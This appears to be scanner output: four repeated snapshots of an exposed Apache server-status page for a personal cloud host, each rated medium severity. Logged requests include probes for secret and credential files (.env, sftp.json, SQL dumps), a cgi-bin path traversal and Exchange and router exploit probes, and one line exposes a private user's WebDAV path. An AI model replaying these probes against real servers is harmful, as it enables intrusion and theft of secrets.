Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Saturday, 21-Sep-2024 22:24:20 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 305 Parent Server MPM Generation: 304 Server uptime: 302 days 15 hours 24 minutes 41 seconds Server load: 0.09 0.02 0.01 Total accesses: 525566 - Total Traffic: 59.2 GB - Total Duration: 76807757 CPU Usage: u864.1 s1697.83 cu5634.69 cs1552.28 - .0373% CPU load .0201 requests/sec - 2432 B/second - 118.2 kB/request - 146.143 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12545814no0yes124000 32545815no0yes025000 Sum200 149000 .........................________________W________.............. ..........._________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-301-0/0/5565. 0.0025345818788700.00.00105.75 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 0-301-0/0/5512. 0.0025345818110840.00.0082.02 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 0-301-0/0/5628. 0.0025345818560590.00.0093.84 162.142.125.219http/1.1 0-301-0/0/5562. 0.0025345828433320.00.00100.97 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 0-301-0/0/5612. 0.0025345808661390.00.00103.11 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 0-301-0/0/5677. 0.0025345818713640.00.00123.25 34.135.151.125http/1.1ravignon.mycloud.paris:80GET / HTTP/1.1 0-301-0/0/5595. 0.0025345818415760.00.0075.07 147.185.132.255http/1.1localhost:80\x16\x03\x01 0-301-0/0/5590. 0.002534581958426340.00.0095.75 57.129.23.166http/1.1 0-301-0/0/5490. 0.0025345808518920.00.0089.73 123.163.114.252http/1.1localhost:80GET /favicon.ico HTTP/1.1 0-301-0/0/5616. 0.002534582668968220.00.00171.89 83.222.191.62http/1.1ravignon.mycloud.paris:443GET /geoserver/wfs?service=wfs&version=2.0.0&request=GetPropert 0-301-0/0/5577. 0.0025345828388340.00.0079.16 94.156.71.65http/1.1 0-301-0/0/5546. 0.0025345848335620.00.0070.58 95.214.55.138http/1.1localhost:80GET / HTTP/1.1 0-301-0/0/5634. 0.002534581658805690.00.0091.98 167.94.145.100h2ravignon.mycloud.paris:443[0/0] init 0-301-0/0/5589. 0.0025345838684930.00.0081.71 162.142.125.202http/1.1localhost:80GET / HTTP/1.1 0-301-0/0/5649. 0.00253458868625770.00.0056.01 162.142.125.202http/1.1 0-301-0/0/5659. 0.002534581729095870.00.0095.77 15.235.41.22http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 0-301-0/0/5572. 0.002534582418746450.00.00129.02 167.94.145.100h2ravignon.mycloud.paris:443[0/0] done 0-301-0/0/5523. 0.0025345828544450.00.00116.29 162.142.125.219http/1.1 0-301-0/0/5548. 0.0025345818302440.00.0089.52 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 0-301-0/0/5481. 0.0025345828753200.00.0088.25 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 0-301-0/0/5506. 0.002534581458262990.00.0064.52 162.142.125.219http/1.1 0-301-0/0/5531. 0.0025345808629450.00.0067.26 57.129.23.166http/1.1 0-301-0/0/5421. 0.0025345808207980.00.0075.30 57.129.23.166http/1.1 0-301-0/0/5548. 0.002534582188637390.00.0091.62 172.168.41.2http/1.1ravignon.mycloud.paris:443GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1 0-301-0/0/5538. 0.0025345808637570.00.00112.75 167.94.145.100http/1.1 1-30425458140/2/7909_ 1.94019389300.00.031824.44 93.174.95.106h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-30425458140/7/7814_ 2.67162219634690.00.081177.81 198.235.24.155http/1.1localhost:80GET / HTTP/1.0 1-30425458140/8/6761_ 2.582103588983320.00.171537.37 3.82.13.85http/1.1 1-30425458140/10/7399_ 2.7501339345820.00.091701.34 64.225.75.246http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-30425458140/6/6759_ 2.7602129404230.00.101288.15 64.225.75.246http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-30425458140/3/8761_ 2.42211019504890.00.021497.86 93.174.95.106http/1.1ravignon.mycloud.paris:443\n 1-30425458140/8/7034_ 2.582103549233860.03.031647.02 3.82.13.85http/1.1 1-30425458140/9/9233_ 2.7701269339780.00.101821.45 64.225.75.246http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-30425458140/8/7277_ 2.60139126690.00.041349.18 64.225.75.246h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-30425458140/10/7678_ 2.477231889508380.00.131685.06 93.174.95.106http/1.1ravignon.mycloud.paris:443GET /sitemap.xml HTTP/1.1 1-30425458140/7/7779_ 2.572442638953220.00.051950.63 13.93.234.212http/1.1 1-30425458140/6/7227_ 2.7801229504230.00.044049.11 64.225.75.246http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-30425458140/10/6896_ 2.6972309398610.00.062082.45 8.216.87.246http/1.1ravignon.mycloud.paris:443POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e 1-30425458140/6/8638_ 2.161309163780.00.051620.11 64.225.75.246http/1.1 1-30425458140/10/6637_ 2.7701379289770.00.131149.58 64.225.75.246http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-30425458140/9/7411_ 2.62009149450.00.051356.85 185.224.128.83http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 1-30425458141/6/7511W 2.57009519310.00.081837.29 64.225.75.246http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-30425458140/10/6541_ 2.6621102428966340.00.101999.66 45.156.130.4http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-30425458140/5/6960_ 2.7401778937120.00.032342.19 64.225.75.246http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-30425458140/11/6647_ 2.60121911957220.00.121956.88 64.225.75.246http/1.1 1-30425458140/10/7612_ 2.6011369126200.00.151898.17 64.225.75.246h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-30425458140/8/6698_ 2.1371909395790.00.113150.91 93.174.95.106http/1.1 1-30425458140/3/6892_ 2.2312119345000.00.043638.61 64.225.75.246h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-30425458140/9/6811_ 2.17162119422370.00.101229.90 93.174.95.106http/1.1 1-30425458140/10/6633_ 2.707192299158700.00.071602.09 94.156.68.162http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 2-283-0/0/2318. 0.00180865823334110.00.0024.70 95.214.55.138http/1.1localhost:80GET / HTTP/1.1 2-283-0/0/228
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb8e5860fa
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Thursday, 19-Sep-2024 20:22:37 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 303 Parent Server MPM Generation: 302 Server uptime: 300 days 13 hours 22 minutes 57 seconds Server load: 0.00 0.00 0.00 Total accesses: 493804 - Total Traffic: 14.5 GB - Total Duration: 76756467 CPU Usage: u1236.82 s1781.18 cu3346.36 cs1066.25 - .0286% CPU load .019 requests/sec - 599 B/second - 30.8 kB/request - 155.439 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12536024no0yes025000 32536025no0yes124000 Sum200 149000 ........................._________________________.............. ...........W________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-301-0/0/5565. 0.007335418788700.00.00105.75 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 0-301-0/0/5512. 0.007335418110840.00.0082.02 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 0-301-0/0/5628. 0.007335418560590.00.0093.84 162.142.125.219http/1.1 0-301-0/0/5562. 0.007335428433320.00.00100.97 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 0-301-0/0/5612. 0.007335408661390.00.00103.11 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 0-301-0/0/5677. 0.007335418713640.00.00123.25 34.135.151.125http/1.1ravignon.mycloud.paris:80GET / HTTP/1.1 0-301-0/0/5595. 0.007335418415760.00.0075.07 147.185.132.255http/1.1localhost:80\x16\x03\x01 0-301-0/0/5590. 0.00733541958426340.00.0095.75 57.129.23.166http/1.1 0-301-0/0/5490. 0.007335408518920.00.0089.73 123.163.114.252http/1.1localhost:80GET /favicon.ico HTTP/1.1 0-301-0/0/5616. 0.00733542668968220.00.00171.89 83.222.191.62http/1.1ravignon.mycloud.paris:443GET /geoserver/wfs?service=wfs&version=2.0.0&request=GetPropert 0-301-0/0/5577. 0.007335428388340.00.0079.16 94.156.71.65http/1.1 0-301-0/0/5546. 0.007335448335620.00.0070.58 95.214.55.138http/1.1localhost:80GET / HTTP/1.1 0-301-0/0/5634. 0.00733541658805690.00.0091.98 167.94.145.100h2ravignon.mycloud.paris:443[0/0] init 0-301-0/0/5589. 0.007335438684930.00.0081.71 162.142.125.202http/1.1localhost:80GET / HTTP/1.1 0-301-0/0/5649. 0.0073354868625770.00.0056.01 162.142.125.202http/1.1 0-301-0/0/5659. 0.00733541729095870.00.0095.77 15.235.41.22http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 0-301-0/0/5572. 0.00733542418746450.00.00129.02 167.94.145.100h2ravignon.mycloud.paris:443[0/0] done 0-301-0/0/5523. 0.007335428544450.00.00116.29 162.142.125.219http/1.1 0-301-0/0/5548. 0.007335418302440.00.0089.52 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 0-301-0/0/5481. 0.007335428753200.00.0088.25 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 0-301-0/0/5506. 0.00733541458262990.00.0064.52 162.142.125.219http/1.1 0-301-0/0/5531. 0.007335408629450.00.0067.26 57.129.23.166http/1.1 0-301-0/0/5421. 0.007335408207980.00.0075.30 57.129.23.166http/1.1 0-301-0/0/5548. 0.00733542188637390.00.0091.62 172.168.41.2http/1.1ravignon.mycloud.paris:443GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1 0-301-0/0/5538. 0.007335408637570.00.00112.75 167.94.145.100http/1.1 1-30225360240/416/5836_ 326.34029380510.0316.08398.91 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 1-30225360240/1291/6779_ 326.366561449620580.0125.63224.82 15.235.41.22http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-30225360240/226/5713_ 326.30118975770.068.35162.65 207.154.212.47http/1.1 1-30225360240/681/6267_ 326.31119328410.0158.53219.16 207.154.212.47h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-30225360240/461/5983_ 326.4611529382460.085.26167.02 207.154.212.47http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-30225360240/2440/7878_ 326.5101339496270.0183.53276.81 207.154.212.47http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-30225360240/435/5943_ 326.36656799153860.0274.05332.07 15.235.41.22http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 1-30225360240/2776/8317_ 326.2365609322770.0280.22411.96 176.177.18.164h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-30225360240/361/5919_ 326.4901299114440.0298.93392.30 207.154.212.47http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-30225360240/1161/6687_ 324.78109494160.086.94145.17 207.154.212.47h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-30225360240/1367/6835_ 326.19108944260.0488.36582.33 207.154.212.47h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-30225360240/416/5830_ 326.35100529494840.0122.41218.54 54.37.79.75http/1.1localhost:80POST / HTTP/1.1 1-30225360240/498/6048_ 326.22100519384860.067.75174.55 54.37.79.75http/1.1 1-30225360240/1684/7147_ 325.33656169155840.097.75191.02 176.177.18.164h2ravignon.mycloud.paris:443[0/0] init 1-30225360240/389/5874_ 325.37109273570.0210.60304.54 176.177.18.164h2ravignon.mycloud.paris:443[0/0] init 1-30225360240/387/5759_ 326.30109135750.0127.18220.20 207.154.212.47h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-30225360240/936/6469_ 326.31109502570.097.51186.14 207.154.212.47http/1.1 1-30225360240/252/5606_ 325.851758951930.0166.03262.51 207.154.212.47http/1.1 1-30225360240/497/5888_ 326.1411598929560.0162.03288.14 207.154.212.47h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-30225360240/266/5682_ 325.551011940780.057.47136.72 207.154.212.47http/1.1 1-30225360240/1027/6454_ 326.340809105210.0251.93355.05 194.26.25.250http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-30225360240/223/5601_ 326.5001359375260.0101.28214.73 207.154.212.47http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-30225360240/381/5908_ 326.4801679334320.0153.55250.99 207.154.212.47http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-30225360240/428/5802_ 326.5201249408420.0197.37251.12 207.154.212.47http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-30225360240/318/5795_ 326.4711369148790.0114.76194.75 207.154.212.47http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 2-283-0/0/2318. 0.00162855423334110.00.0024.70 95.214.55.138http/1.1localhost:80</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb2f6816d0
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Tuesday, 17-Sep-2024 21:38:03 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 301 Parent Server MPM Generation: 300 Server uptime: 298 days 14 hours 38 minutes 24 seconds Server load: 0.08 0.02 0.01 Total accesses: 459566 - Total Traffic: 8.4 GB - Total Duration: 76180277 CPU Usage: u873.77 s1682.4 cu3294.61 cs1046.7 - .0267% CPU load .0178 requests/sec - 350 B/second - 19.2 kB/request - 165.766 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12526880no0yes025000 32526881no0yes124000 Sum200 149000 ........................._________________________.............. ...........__________________W______............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-283-0/0/5481. 0.00146028108720280.00.00105.38 103.121.39.54h2ravignon.mycloud.paris:443GET /logs/debug.log HTTP/2.0 0-283-0/0/5424. 0.00146028118059590.00.0081.64 103.121.39.54h2ravignon.mycloud.paris:443GET /errors.log HTTP/2.0 0-283-0/0/5527. 0.00146028108496030.00.0093.51 103.121.39.54h2ravignon.mycloud.paris:443GET /backup.sql HTTP/2.0 0-283-0/0/5472. 0.00146028108377100.00.00100.68 103.121.39.54h2ravignon.mycloud.paris:443[6858/6858] done 0-283-0/0/5519. 0.00146028128579270.00.00102.77 103.121.39.54h2ravignon.mycloud.paris:443GET /htdocs/index.php HTTP/2.0 0-283-0/0/5588. 0.00146028108636270.00.00122.92 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=views HTTP/2.0 0-283-0/0/5494. 0.00146028108343630.00.0074.72 103.121.39.54h2ravignon.mycloud.paris:443GET /tmp/debug.log HTTP/2.0 0-283-0/0/5502. 0.0014602812448350640.00.0095.40 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=events HTTP/2.0 0-283-0/0/5403. 0.00146028128456620.00.0089.40 103.121.39.54h2ravignon.mycloud.paris:443[6834/6834] done: stream 13667, GET /.idea 0-283-0/0/5529. 0.0014602811378898780.00.00171.17 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=security HTTP/2.0 0-283-0/0/5475. 0.0014602811348336540.00.0078.86 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=profiling HTTP/2.0 0-283-0/0/5468. 0.00146028108281790.00.0070.27 103.121.39.54h2ravignon.mycloud.paris:443GET /assets/debug.log HTTP/2.0 0-283-0/0/5542. 0.0014602812638765250.00.0091.75 103.121.39.54h2ravignon.mycloud.paris:443GET /log/debug.log HTTP/2.0 0-283-0/0/5466. 0.00146028108614240.00.0078.11 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=log HTTP/2.0 0-283-0/0/5571. 0.00146028108573160.00.0055.78 103.121.39.54h2ravignon.mycloud.paris:443GET /cache/debug.log HTTP/2.0 0-283-0/0/5558. 0.0014602812539052910.00.0095.51 83.97.73.245http/1.1ravignon.mycloud.paris:443GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 0-283-0/0/5481. 0.0014602811348670760.00.00128.73 103.121.39.54h2ravignon.mycloud.paris:443GET /.config/debug.log HTTP/2.0 0-283-0/0/5431. 0.0014602811388496420.00.00115.95 103.121.39.54h2ravignon.mycloud.paris:443GET /debug.php HTTP/2.0 0-283-0/0/5438. 0.0014602812368233660.00.0089.22 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=db HTTP/2.0 0-283-0/0/5381. 0.00146028108696600.00.0087.94 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=router HTTP/2.0 0-283-0/0/5430. 0.00146028108189520.00.0064.21 103.121.39.54h2ravignon.mycloud.paris:443GET /access.log HTTP/2.0 0-283-0/0/5427. 0.00146028108564340.00.0066.85 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=request HTTP/2.0 0-283-0/0/5349. 0.0014602811358151910.00.0075.01 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=mail HTTP/2.0 0-283-0/0/5465. 0.00146028118564690.00.0091.29 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=asset HTTP/2.0 0-283-0/0/5452. 0.00146028108583350.00.00112.48 103.121.39.54h2ravignon.mycloud.paris:443GET /database.sql HTTP/2.0 1-30025268800/39/5360_ 12.18585009306480.00.3582.54 193.111.248.148http/1.1localhost:80POST /dvr/cmd HTTP/1.1 1-30025268800/48/5446_ 11.9225571499555320.00.2898.95 152.32.235.85http/1.1 1-30025268800/51/5442_ 12.18585008906490.00.2994.04 193.111.248.148http/1.1localhost:80POST /dvr/cmd HTTP/1.1 1-30025268800/45/5536_ 12.1625571469248030.04.1060.32 91.92.249.130http/1.1ravignon.mycloud.paris:443GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1 1-30025268800/41/5487_ 12.084999298370.01.3981.49 192.46.211.230h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-30025268800/53/5388_ 12.228519418850.00.3992.98 5.8.11.202http/1.1localhost:80\x16\x03\x02\x01o\x01 1-30025268800/43/5456_ 11.85661199073820.00.2957.73 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-30025268800/41/5490_ 11.8561489228040.00.23131.40 192.46.211.230h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-30025268800/43/5510_ 12.18409025720.00.2893.02 192.46.211.230http/1.1 1-30025268800/49/5487_ 11.7058451359409060.00.4357.96 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-30025268800/48/5427_ 12.18584708852250.00.3293.68 193.111.248.148http/1.1localhost:80POST /dvr/cmd HTTP/1.1 1-30025268800/47/5365_ 12.0851309331500.00.3195.88 192.46.211.230h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-30025268800/46/5501_ 11.9741259308770.00.25106.52 192.46.211.230http/1.1 1-30025268800/49/5419_ 11.74856989084340.00.3092.99 199.45.154.134http/1.1 1-30025268800/49/5436_ 12.19487939217590.00.3493.74 45.43.33.218http/1.1localhost:80GET / HTTP/1.1 1-30025268800/45/5318_ 11.7238601299055620.01.1692.71 57.129.23.166http/1.1 1-30025268800/47/5478_ 12.0058441209430680.00.2988.32 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-30025268800/47/5315_ 12.12584208891750.00.2896.25 5.196.102.65http/1.1localhost:80GET /favicon.ico HTTP/1.1 1-30025268800/44/5350_ 12.15341218866410.00.37125.88 85.90.246.159http/1.1 1-30025268800/47/5365_ 12.21857211849300.00.2878.93 199.45.154.134http/1.1localhost:80GET / HTTP/1.1 1-30025268800/47/5378_ 11.635845689018460.01.28102.84 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-30025268800/48/5333_ 12.12487609303800.00.31113.22 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 1-30025268800/40/5484_ 12.20386009254160.00.2397.11 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 1-30025268800/45/5333_ 12.185849
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb998be34d
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Sunday, 15-Sep-2024 21:52:19 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 299 Parent Server MPM Generation: 298 Server uptime: 296 days 14 hours 52 minutes 40 seconds Server load: 0.16 0.03 0.01 Total accesses: 455409 - Total Traffic: 8.3 GB - Total Duration: 75296490 CPU Usage: u847.87 s1665.12 cu3274.07 cs1041.64 - .0266% CPU load .0178 requests/sec - 349 B/second - 19.2 kB/request - 165.338 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12518282no0yes124000 32518283no0yes025000 Sum200 149000 .........................______________________W__.............. ..........._________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-283-0/0/5481. 0.00128833608720280.00.00105.38 103.121.39.54h2ravignon.mycloud.paris:443GET /logs/debug.log HTTP/2.0 0-283-0/0/5424. 0.00128833618059590.00.0081.64 103.121.39.54h2ravignon.mycloud.paris:443GET /errors.log HTTP/2.0 0-283-0/0/5527. 0.00128833608496030.00.0093.51 103.121.39.54h2ravignon.mycloud.paris:443GET /backup.sql HTTP/2.0 0-283-0/0/5472. 0.00128833608377100.00.00100.68 103.121.39.54h2ravignon.mycloud.paris:443[6858/6858] done 0-283-0/0/5519. 0.00128833628579270.00.00102.77 103.121.39.54h2ravignon.mycloud.paris:443GET /htdocs/index.php HTTP/2.0 0-283-0/0/5588. 0.00128833608636270.00.00122.92 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=views HTTP/2.0 0-283-0/0/5494. 0.00128833608343630.00.0074.72 103.121.39.54h2ravignon.mycloud.paris:443GET /tmp/debug.log HTTP/2.0 0-283-0/0/5502. 0.0012883362448350640.00.0095.40 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=events HTTP/2.0 0-283-0/0/5403. 0.00128833628456620.00.0089.40 103.121.39.54h2ravignon.mycloud.paris:443[6834/6834] done: stream 13667, GET /.idea 0-283-0/0/5529. 0.0012883361378898780.00.00171.17 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=security HTTP/2.0 0-283-0/0/5475. 0.0012883361348336540.00.0078.86 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=profiling HTTP/2.0 0-283-0/0/5468. 0.00128833608281790.00.0070.27 103.121.39.54h2ravignon.mycloud.paris:443GET /assets/debug.log HTTP/2.0 0-283-0/0/5542. 0.0012883362638765250.00.0091.75 103.121.39.54h2ravignon.mycloud.paris:443GET /log/debug.log HTTP/2.0 0-283-0/0/5466. 0.00128833608614240.00.0078.11 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=log HTTP/2.0 0-283-0/0/5571. 0.00128833608573160.00.0055.78 103.121.39.54h2ravignon.mycloud.paris:443GET /cache/debug.log HTTP/2.0 0-283-0/0/5558. 0.0012883362539052910.00.0095.51 83.97.73.245http/1.1ravignon.mycloud.paris:443GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 0-283-0/0/5481. 0.0012883361348670760.00.00128.73 103.121.39.54h2ravignon.mycloud.paris:443GET /.config/debug.log HTTP/2.0 0-283-0/0/5431. 0.0012883361388496420.00.00115.95 103.121.39.54h2ravignon.mycloud.paris:443GET /debug.php HTTP/2.0 0-283-0/0/5438. 0.0012883362368233660.00.0089.22 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=db HTTP/2.0 0-283-0/0/5381. 0.00128833608696600.00.0087.94 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=router HTTP/2.0 0-283-0/0/5430. 0.00128833608189520.00.0064.21 103.121.39.54h2ravignon.mycloud.paris:443GET /access.log HTTP/2.0 0-283-0/0/5427. 0.00128833608564340.00.0066.85 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=request HTTP/2.0 0-283-0/0/5349. 0.0012883361358151910.00.0075.01 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=mail HTTP/2.0 0-283-0/0/5465. 0.00128833618564690.00.0091.29 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=asset HTTP/2.0 0-283-0/0/5452. 0.00128833608583350.00.00112.48 103.121.39.54h2ravignon.mycloud.paris:443GET /database.sql HTTP/2.0 1-29825182820/10/5301_ 1.7861671599173900.00.1282.00 15.235.41.22http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 1-29825182820/7/5379_ 1.80498709395190.00.0398.56 45.148.10.242http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-29825182820/9/5363_ 1.8122918763340.00.0593.59 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 1-29825182820/8/5470_ 1.81243609032370.00.0356.09 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 1-29825182820/4/5412_ 1.8052794709152480.00.0579.84 205.210.31.9http/1.1ravignon.mycloud.paris:443GET /index.php/login HTTP/1.1 1-29825182820/6/5306_ 1.841652539289300.00.0592.40 51.254.49.104http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-29825182820/5/5388_ 1.224987648943400.00.0557.23 45.148.10.242http/1.1 1-29825182820/9/5427_ 1.81128329091990.00.08130.99 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 1-29825182820/7/5442_ 1.7522948888830.00.0492.59 57.129.23.166http/1.1 1-29825182820/6/5413_ 1.3312781939278200.00.0457.32 141.255.160.234http/1.1 1-29825182820/6/5361_ 1.222436988687580.00.0593.25 57.129.23.166http/1.1 1-29825182820/5/5289_ 1.59616629156140.00.0395.42 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 1-29825182820/7/5427_ 1.7312771229140320.00.08103.11 104.193.255.59http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-29825182820/6/5348_ 1.77671128915170.00.0392.56 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 1-29825182820/4/5364_ 1.59671110949062470.00.0393.26 57.129.23.166http/1.1 1-29825182820/6/5248_ 1.70712228910130.00.0491.40 167.94.138.36http/1.1localhost:80GET / HTTP/1.1 1-29825182820/7/5399_ 1.57779829252990.00.0787.80 167.94.138.115http/1.1 1-29825182820/5/5240_ 1.76780338692770.00.0395.78 45.156.128.37http/1.1localhost:80GET / HTTP/1.1 1-29825182820/5/5283_ 1.26111698740570.00.02125.38 165.227.173.41http/1.1 1-29825182820/7/5292_ 1.37779813511723110.00.0878.46 167.94.138.115http/1.1 1-29825182820/6/5307_ 1.76712718893690.00.0498.48 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 1-29825182820/7/5261_ 1.5971221929166550.00.06112.77 167.94.138.36http/1.1 1-29825182821/5/5419W 1.56009129610.00.0396.73 